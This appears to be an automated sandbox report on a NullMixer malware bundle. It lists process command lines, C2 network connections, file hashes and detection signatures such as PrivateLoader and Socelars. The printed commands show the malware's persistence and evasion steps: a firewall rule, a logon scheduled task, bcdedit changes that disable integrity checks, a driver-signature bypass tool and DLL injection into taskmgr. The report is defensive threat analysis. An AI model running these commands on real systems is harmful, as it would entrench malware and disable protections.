\??\C:\Windows\system32\conhost.exe "-1326065463-17732016232079665164538795616749644004-1611431629-1021433569-552968636"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe

"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe"

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Program Files (x86)\Gparted\Build.sfx.exe

"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1

C:\Program Files (x86)\Gparted\Build.exe

"C:\Program Files (x86)\Gparted\Build.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1739371705716997079-3753041-21431654931733133288-1560707188-21284361101814353396"

C:\Program Files (x86)\Gparted\gimagex.exe

"C:\Program Files (x86)\Gparted\gimagex.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /306-306

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "410733652-792252731-15552243301337362575265087720-19596527081131691164-1956904596"

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 1672

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination            Proto Domain
FR      212.193.30.45:80       tcp   212.193.30.45
FR      212.193.30.45:443      tcp   -
FR      212.193.30.45:443      tcp   -
FR      212.193.30.29:80       tcp   -
US      8.8.8.8:53             udp   www.listincode.com
US      8.8.8.8:53             udp   56.jpgamehome.com
US      52.203.72.196:443      tcp   www.listincode.com
US      8.8.8.8:53             udp   tweakballs.com
US      8.8.8.8:53             udp   ip-api.com
US      208.95.112.1:80        tcp   ip-api.com
US      54.84.177.46:443       tcp   www.listincode.com
US      8.8.8.8:53             udp   cdn.discordapp.com
FI      135.181.129.119:4805   tcp   -
US      8.8.8.8:53             udp   webdatingcompany.me
US      162.159.133.233:443    tcp   cdn.discordapp.com
US      8.8.8.8:53             udp   all-mobile-pa1ments.com.mx
US      8.8.8.8:53             udp   buy-fantasy-football.com.sg
US      8.8.8.8:53             udp   buy-fantasy-gxmes.com.sg
US      8.8.8.8:53             udp   topniemannpickshop.cc
US      8.8.8.8:53             udp   iplogger.org
US      104.26.3.46:443        tcp   iplogger.org
US      104.26.3.46:443        tcp   iplogger.org
FR      91.121.67.60:51630     tcp   -
US      104.26.3.46:443        tcp   iplogger.org
US      8.8.8.8:53             udp   c.pki.goog
GB      142.250.187.227:80     tcp   c.pki.goog
FI      135.181.129.119:4805   tcp   -
FI      135.181.79.37:10902    tcp   -
FI      135.181.129.119:4805   tcp   -
FI      135.181.79.37:10902    tcp   -
US      8.8.8.8:53             udp   pastebin.com
US      172.67.19.24:443       tcp   pastebin.com
US      8.8.8.8:53             udp   wfsdragon.ru
US      104.21.5.208:80        tcp   wfsdragon.ru
DE      212.192.241.62:80      tcp   -
FI      135.181.129.119:4805   tcp   -
FI      135.181.79.37:10902    tcp   -
US      8.8.8.8:53             udp   www.google.com
FI      135.181.129.119:4805   tcp   -
FI      135.181.79.37:10902    tcp   -
FR      91.121.67.60:51630     tcp   -
FI      135.181.129.119:4805   tcp   -
FI      135.181.79.37:10902    tcp   -
FI      135.181.129.119:4805   tcp   -
FI      135.181.79.37:10902    tcp   -
US      8.8.8.8:53             udp   crl.microsoft.com
GB      2.19.117.18:80         tcp   crl.microsoft.com
US      8.8.8.8:53             udp   trumops.com
US      8.8.8.8:53             udp   retoti.com
US      8.8.8.8:53             udp   logs.trumops.com
US      8.8.8.8:53             udp   logs.retoti.com
US      8.8.8.8:53             udp   www.yahoo.com
US      8.8.8.8:53             udp   f5b086b2-fc5a-46c5-b748-f39ef0e7356e.uuid.trumops.com
US      8.8.8.8:53             udp   server14.trumops.com
US      44.221.84.105:443      tcp   server14.trumops.com
US      8.8.8.8:53             udp   msdl.microsoft.com
US      204.79.197.219:443     tcp   msdl.microsoft.com
US      8.8.8.8:53             udp   www.microsoft.com
FI      135.181.129.119:4805   tcp   -
US      8.8.8.8:53             udp   vsblobprodscussu5shard30.blob.core.windows.net
US      20.150.38.228:443      tcp   vsblobprodscussu5shard30.blob.core.windows.net
FI      135.181.79.37:10902    tcp   -
US      8.8.8.8:53             udp   bitbucket.org
IE      185.166.142.21:443     tcp   bitbucket.org
FI      135.181.129.119:4805   tcp   -
FI      135.181.79.37:10902    tcp   -
US      72.84.118.132:8080     tcp   -
FR      91.121.67.60:51630     tcp   -
FI      135.181.129.119:4805   tcp   -
FI      135.181.79.37:10902    tcp   -
FI      135.181.129.119:4805   tcp   -
US      8.8.8.8:53             udp   vsblobprodscussu5shard20.blob.core.windows.net
US      20.150.70.36:443       tcp   vsblobprodscussu5shard20.blob.core.windows.net
FI      135.181.79.37:10902    tcp   -
FI      135.181.129.119:4805   tcp   -
FI      135.181.79.37:10902    tcp   -
US      72.84.118.132:8080     tcp   -
FI      135.181.79.37:10902    tcp   -
FI      135.181.129.119:4805   tcp   -
FR      91.121.67.60:51630     tcp   -
FI      135.181.79.37:10902    tcp   -
FI      135.181.129.119:4805   tcp   -
FI      135.181.79.37:10902    tcp   -
FI      135.181.129.119:4805   tcp   -
US      8.8.8.8:53             udp   dumancue.com
FI      135.181.79.37:10902    tcp   -
FI      135.181.129.119:4805   tcp   -
FI      135.181.79.37:10902    tcp   -
FI      135.181.129.119:4805   tcp   -
FR      91.121.67.60:51630     tcp   -
FI      135.181.79.37:10902    tcp   -
FI      135.181.129.119:4805   tcp   -
FI      135.181.79.37:10902    tcp   -
FI      135.181.129.119:4805   tcp   -
FI      135.181.79.37:10902    tcp   -
FI      135.181.129.119:4805   tcp   -
FI      135.181.79.37:10902    tcp   -
FI      135.181.129.119:4805   tcp   -
FR      91.121.67.60:51630     tcp   -
FI      135.181.79.37:10902    tcp   -
FI      135.181.129.119:4805   tcp   -
US      44.221.84.105:443      tcp   server14.trumops.com
FI      135.181.79.37:10902    tcp   -

Files

\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe

MD5 0c0e1a604e0da52b76b20bc2adba8192
SHA1 c6df017caaebdfbf3d86b022570aeb6c2cee1f3a
SHA256 a8e57cdcd0fa1640cde72c232cd5c3b07be08f2ac5ed88d78dcc93b627c935e2
SHA512 797568375efa0902493cadffa79ad0638a34d3cda2ae961557fe9c77c463a9ffd4a40695464aeaf19a3be7f29c085538e0e1eaac52e7c15a1de95b2db2621d8e

\Users\Admin\AppData\Local\Temp\7zS47BF0566\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/2860-60-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS47BF0566\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2860-64-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2860-73-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2860-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2860-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2860-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2860-82-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2860-81-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2860-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe

MD5 4f11e641d16d9590ac1c9f70d215050a
SHA1 75688f56c970cd55876f445c8319d7b91ce556fb
SHA256 efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0
SHA512 b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1618e4439d986270.exe

MD5 f4a5ef05e9978b2215c756154f9a3fdb
SHA1 c933a1debeea407d608464b33588b19c299295c6
SHA256 d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69
SHA512 f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe

MD5 999cfa89375bc54358907287d1fc7462
SHA1 7e67a8f2161e36da1d26a5bc3dc70eb00f313345
SHA256 e74473a1edde3b073d2242d2efaa98bf548ab71a8515110a05f39a9f6a0ae69a
SHA512 169df388945cef468b88e1e963c68a2fae62e6ec238d53c8aaf6712e75789a6c94673f7c338ad5de42d4a6733f9919e7d7b7d087c5e94514479c1e85e8153b65

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe

MD5 83a0d323899ff2f761f434dc017900ba
SHA1 a44010a7d098a737f30ea04d280502d99718b18d
SHA256 b90fd0244165858b4b4d1390f039731fbce2730a7482588f13e66e52e20fe124
SHA512 40b268d0c1181ea950f4f7b3fa3bf10bcb84330047657ba2c1adec4c4e5f99b24d988086730bdebe3176e8e2d26fe841a4feaf9376c0d002fdb77291e97f7f6e

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon164c5af508c3.exe

MD5 3ede4ea9236fb79e46017591d7fa89ba
SHA1 a064bb878b2d4f136dadeb061f7321bfc617355b
SHA256 e41420775c1b48d6c59060a40002802bfd41195368c9c30130ce9ad83bb3f169
SHA512 7a7acce6cd4a8801885336d0dd5100ed3c925f9676c77c7192c7c54bc010dbb8cbc9e9b03bdba1ac6125f3139ab1a5d363cbab00b68b8b97ff6647a9cc5df434

memory/2860-109-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe

MD5 cf7a094bc477eeba7e8d568f12bf0ba9
SHA1 4b9bca3bd6d3d1125dbd13993d0c4118e479ae79
SHA256 4960c14c5b5a9d4abf64ef2cf3d2357403ad7ab5173bf5f063f162557bbfe2e5
SHA512 f9e0579878f649f1588435c0bc8846d84058666aebd6f676b1e9ec51950375360b01333e073d7e7cdcbe683f78bb6de7f945d8e2d3290ba9dd4512480e6d25da

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe

MD5 0b8ef03e8c9752a88faa2907a62d0783
SHA1 283b229a5c68528363ab3595ea8b5b37025fb1ec
SHA256 63ddcac0ee5ecd7239cb817b176480275ad3f6fc9bfb1f4a3086d19e578da4ea
SHA512 bccb76031a7df528ebed8d3c33d5ea8f2bdd69858e26931e8ad348a3805fdfd9b377ae416c087fa6959c899fb17f9d1561773ac06aa6b803b8e73bc9832468ec

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe

MD5 314e3dc1f42fb9d858d3db84deac9343
SHA1 dec9f05c3bcc759b76f4109eb369db9c9666834b
SHA256 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08
SHA512 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe

MD5 58267e9b25e8df4530d4e7b4e8b273c0
SHA1 bb08b8638013fd6ac7fb30f0d674a0ada0dab5ac
SHA256 dce7b289556aa5027cd166ce2916b0d25081377071c3428609f6368d1d26e1ef
SHA512 488f40ce734197fa4aa36bda91a9283ddabfc41117f367a3643bebecb6bb5f43e170c4804989a934fa3cc25d1a07559b1e1abf14d3efc0aacc3323280c3cbec3

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe

MD5 ebf343da80ba03d41832a6f1178940f8
SHA1 06b5689406be75fe9b6ff3b6ba68d712f6597819
SHA256 85dfc3e1c3748a6a48b0b1b34df6853d68e26ce12c13463a9b0f2cc899260bd5
SHA512 5c971e9eccc7bcca8a77c46ba7f9ff1765eecf243146f805eb90809e3bd28e4b4038150bf7f95fa19ea5b90f77af5c1f4916093df13b3b732dff8aeee68755c4

\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe

MD5 917921d15cb0e081cc589fb8623cbfdc
SHA1 a8c5dc84e100aea9c9de8b2e76c6469d0de8c747
SHA256 c2496991fe4a847ed5585f00e8fdf2dc9fc679636f5e9e4add9086649bb24717
SHA512 8eff74f2ba55392c0bb33159aa367cccede62eda00c0ef03b2f05ee42cdeb41341f780c6757b997b87a0e2336e3f31135b24b72865d69e449623a230a781d3ba

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 6c41d65cc641e21398d68075326c9a5e
SHA1 946ac9b57ed3076ed9e9ec17c05a931a5f56bdd6
SHA256 972db3356bf538976e613b0c0c582472ea672cb8a0d5c2976ce9b546c4904036
SHA512 3c8e981d882267f67d52f54461f24312ed4adc97bc697938b816b3461f7b17e82c433693c6bf10669ec8f5b4bf4a9472ad9f741088750726a21bbf097d66b940

memory/2368-172-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2572-168-0x0000000002850000-0x0000000002F4D000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe

MD5 b33a3fb6b491b328dacaf18c302b20de
SHA1 41281e81ec9ba49af4af18f3c61038e62818d3c6
SHA256 088d635941437ab637abea3d698c71dedf0f24d5dffd62f6b1fe4329b8e7de72
SHA512 a247cf6aa60d3cbacc46242a51793c6a6e3a3c00c1276af6b59d6b60ffb40d7915b09a9169a521f4326ecc622be29e71fb4cbe705f52e4e28e5d5802630b793e

memory/804-188-0x00000000011F0000-0x00000000018ED000-memory.dmp

memory/804-182-0x00000000011F0000-0x00000000018ED000-memory.dmp

memory/956-186-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/1928-183-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2016-192-0x0000000001320000-0x0000000001388000-memory.dmp

memory/1508-194-0x0000000000E00000-0x0000000000E68000-memory.dmp

memory/1448-193-0x00000000000B0000-0x00000000000F2000-memory.dmp

memory/804-197-0x0000000000400000-0x0000000000AFD000-memory.dmp

memory/1784-201-0x00000000011D0000-0x00000000011D8000-memory.dmp

memory/1928-244-0x0000000000400000-0x0000000000414000-memory.dmp

memory/804-238-0x0000000000400000-0x0000000000AFD000-memory.dmp

memory/804-237-0x0000000003C80000-0x0000000003C81000-memory.dmp

memory/804-235-0x0000000003C80000-0x0000000003C81000-memory.dmp

memory/2836-245-0x0000000000400000-0x0000000000414000-memory.dmp

memory/804-232-0x0000000003000000-0x0000000003001000-memory.dmp

memory/804-230-0x0000000003000000-0x0000000003001000-memory.dmp

memory/804-227-0x0000000002F50000-0x0000000002F51000-memory.dmp

memory/804-225-0x0000000002F50000-0x0000000002F51000-memory.dmp

memory/804-222-0x0000000002EA0000-0x0000000002EA1000-memory.dmp

memory/804-220-0x0000000002EA0000-0x0000000002EA1000-memory.dmp

memory/804-217-0x00000000029E0000-0x00000000029E1000-memory.dmp

memory/804-215-0x00000000029E0000-0x00000000029E1000-memory.dmp

memory/804-213-0x00000000029E0000-0x00000000029E1000-memory.dmp

memory/804-212-0x0000000000D00000-0x0000000000D01000-memory.dmp

memory/804-210-0x0000000000D00000-0x0000000000D01000-memory.dmp

memory/804-208-0x0000000000D00000-0x0000000000D01000-memory.dmp

memory/1948-243-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe

MD5 7d7f14a1b3b8ee4e148e82b9c2f28aed
SHA1 649a29887915908dfba6bbcdaed2108511776b5a
SHA256 623a56a34174f3dcb179796205294124918996ccc8b56062b419ab8354df35cb
SHA512 585dda13cda86d077d28cdfbe799d4356967394e09a17e3ce406f557d14ec24f6b6cbdf0a7b2beaaae8743b2c545b898a12eeeeb56579b8fa560202a290370d3

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

C:\Users\Admin\AppData\Local\Temp\is-MAFVS.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2860-108-0x0000000064940000-0x0000000064959000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-MAFVS.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2860-107-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2860-106-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2860-104-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2860-100-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ad13d7ad1b02.exe

MD5 6881c116d2a78c375de73a298a732427
SHA1 36112627325603afc821d28b2da69f7da58e27ab
SHA256 c15359f15f0402b2db3b3704d0bacee6996c04bc1f37195eb02ac30cf2fc5844
SHA512 598cc49d79c236f6fc493438cd103e367c477480adf10f279613767536762c67c1b712bb00fb620c535647f1e002d88d0cba60cab02ef602be8e7bc009c0d728

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe

MD5 34025b6eb0aa1236b91ca1ab765acbd3
SHA1 cfb12b89aa55158e7b0b38f8fd5b8bf590660793
SHA256 db3c03a5f74e0e9114883bb5c0db60abb4f32e4712e32a953179f0626c529b14
SHA512 d5d4cf4f3dcdc79ae92792307ee82922af55bdc4d81708c140c03c1979da3b8e2d0f009ddde6f680a0197ab7668824dab81393ba9bca6533a603eddd30e22fdd

memory/2860-79-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2860-78-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2860-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2860-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2860-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\libstdc++-6.dll

C:\Program Files (x86)\Gparted\Build.exe

C:\Program Files (x86)\Gparted\gimagex.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SDK23TBKX6BDNIQIPQ1Y.temp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

C:\Users\Admin\AppData\Local\Temp\Cab454A.tmp

C:\Users\Admin\AppData\Local\Temp\Tar517B.tmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

C:\Users\Admin\AppData\Local\Temp\osloader.exe

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

Analysis: behavioral2

Detonation Overview

Submitted: 2024-11-06 10:40

Reported: 2024-11-06 10:43

Platform: win10v2004-20241007-en

Max time kernel: 148s

Max time network: 150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe"

Signatures

Detect Fabookie payload

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3956 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe
PID 1416 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4324 wrote to memory of 2264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1416 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
